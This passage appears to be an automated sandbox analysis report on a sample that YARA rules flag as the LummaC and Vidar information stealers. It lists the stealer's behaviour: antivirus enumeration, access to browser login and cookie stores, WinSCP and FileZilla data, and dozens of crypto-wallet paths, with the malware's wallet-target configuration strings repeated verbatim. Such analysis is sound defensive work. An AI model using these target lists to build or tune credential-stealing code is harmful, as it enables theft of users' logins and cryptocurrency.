Code function: 3_2_00410D2E GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

3_2_00410D2E

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: RegAsm.exe, 00000003.00000002.2384321664.000000000125A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2704852578.000000000121A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2704852578.000000000127E000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.2410755842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2304480133.00000000040B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.3725570.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.3725570.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1680508466.0000000003725000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7408, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7476, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 2256, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: RegAsm.exe, 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ,huobi.,poloniex.,kraken.,okex.,binance.,bitfinex.,gdax.,ethereum.,exodus.,metamask.,myetherwallet.,electrum.,bitcoin.,blockchain.,coinomi.,words.,meta.,mask.,eth.,recovery.\|150\|3\|windows,Program Files,Program Files (x86),AppData,ProgramData,.lnk,.exe,.scr,.com,.pif,.mp3\|DESKTOP\|%DESKTOP%\\|wallet.,seed.,btc.,key.,2fa.,crypto.,coin.,private.,2fa.,auth.,ledger.,trezor.,pass.,wal.,upbit.,bcex.,bithimb.,hitbtc.,bitflyer.,kucoin.,huobi.,poloniex.,kraken.,okex.,binance.,bitfinex.,gdax.,ethereum.,exodus.,metamask.,myetherwallet.,electrum.,bitcoin.,blockchain.,coinomi.,words.,meta.,mask.,eth.,recovery.\|150\|2\|Windows,Program Files,Program Files (x86),AppData,ProgramData,.lnk,.exe,.scr,.com,.pif,.mp3\|
Source: RegAsm.exe, 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \Electrum\wallets\
Source: RegAsm.exe, 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ElectrumLTC
Source: RegAsm.exe, 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \Ethereum\
Source: RegAsm.exe, 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ,huobi.,poloniex.,kraken.,okex.,binance.,bitfinex.,gdax.,ethereum.,exodus.,metamask.,myetherwallet.,electrum.,bitcoin.,blockchain.,coinomi.,words.,meta.,mask.,eth.,recovery.\|150\|3\|windows,Program Files,Program Files (x86),AppData,ProgramData,.lnk,.exe,.scr,.com,.pif,.mp3\|DESKTOP\|%DESKTOP%\\|wallet.,seed.,btc.,key.,2fa.,crypto.,coin.,private.,2fa.,auth.,ledger.,trezor.,pass.,wal.,upbit.,bcex.,bithimb.,hitbtc.,bitflyer.,kucoin.,huobi.,poloniex.,kraken.,okex.,binance.,bitfinex.,gdax.,ethereum.,exodus.,metamask.,myetherwallet.,electrum.,bitcoin.,blockchain.,coinomi.,words.,meta.,mask.,eth.,recovery.\|150\|2\|Windows,Program Files,Program Files (x86),AppData,ProgramData,.lnk,.exe,.scr,.com,.pif,.mp3\|
Source: RegAsm.exe, 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ,huobi.,poloniex.,kraken.,okex.,binance.,bitfinex.,gdax.,ethereum.,exodus.,metamask.,myetherwallet.,electrum.,bitcoin.,blockchain.,coinomi.,words.,meta.,mask.,eth.,recovery.\|150\|3\|windows,Program Files,Program Files (x86),AppData,ProgramData,.lnk,.exe,.scr,.com,.pif,.mp3\|DESKTOP\|%DESKTOP%\\|wallet.,seed.,btc.,key.,2fa.,crypto.,coin.,private.,2fa.,auth.,ledger.,trezor.,pass.,wal.,upbit.,bcex.,bithimb.,hitbtc.,bitflyer.,kucoin.,huobi.,poloniex.,kraken.,okex.,binance.,bitfinex.,gdax.,ethereum.,exodus.,metamask.,myetherwallet.,electrum.,bitcoin.,blockchain.,coinomi.,words.,meta.,mask.,eth.,recovery.\|150\|2\|Windows,Program Files,Program Files (x86),AppData,ProgramData,.lnk,.exe,.scr,.com,.pif,.mp3\|
Source: RegAsm.exe, 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: RegAsm.exe, 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: keystore
Source: RegAsm.exe, 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \Electrum-LTC\wallets\

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\backups\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
